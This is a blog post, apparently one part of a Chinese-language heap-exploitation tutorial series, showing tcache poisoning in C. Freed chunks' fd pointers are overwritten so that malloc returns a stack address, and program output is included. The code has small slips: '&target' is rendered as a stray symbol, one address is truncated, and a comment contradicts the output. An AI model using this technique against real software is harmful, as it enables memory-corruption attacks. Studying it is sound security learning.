Skip to main content
hokak の sweet home

Bin

·1 min· loading · loading · ·
hokak
Author
hokak
need more sleep
Table of Contents
Heap Exploitation - This article is part of a series.
Part 1: Heap
Part 2: Chunk
Part 3: Bin
Part 4: Arena
Part 5: Malloc
Part 6: Free
Part 9: Bin
Part 10: This Article
Part 11: Unsorted Bin Attack
Part 12: Largebin Attack
Part 13: Unsafe Unlink
版本latest
效果可以構造一個allocated chunk在任意writable address上

先malloc兩個以上的tcache
#

unsigned long int *ptr0, *ptr1;
int target;

ptr0 = malloc(0x10);
ptr1 = malloc(0x10);
target = 0xdead;

printf("chunk 1: %p\n", ptr0);
printf("chunk 2: %p\n", ptr1);
printf("int:  %p\n\n", &target);

output

chunk 1: 0x26122260
chunk 2: 0x26122280
int:  0x7ffc6c21674

alt text

free
#

free(ptr0); //tcache -> Chunk0
free(ptr1); //tcache -> Chunk1 -> Chunk0

竄改fd成target
#

*ptr1 = (unsigned long long)⌖ //tcache -> target

alt text

malloc
#

這時候應該能看到malloc了一塊heap到stack上了

unsigned long int *ptr2, *ptr3;
ptr2 = malloc(0x10);
ptr3 = malloc(0x10);
printf("Chunk 3: %p contains: %lx\n", ptr2, *ptr2); //chunk1, tcache -> target
printf("Chunk 4: %p contains: %lx\n", ptr3, *ptr3); //chunk0, tcache -> null

Chunk 3: 0x26122280 contains: 7ffc6c216740
Chunk 4: 0x7ffc6c216740 contains: dead
Heap Exploitation - This article is part of a series.
Part 1: Heap
Part 2: Chunk
Part 3: Bin
Part 4: Arena
Part 5: Malloc
Part 6: Free
Part 9: Bin
Part 10: This Article
Part 11: Unsorted Bin Attack
Part 12: Largebin Attack
Part 13: Unsafe Unlink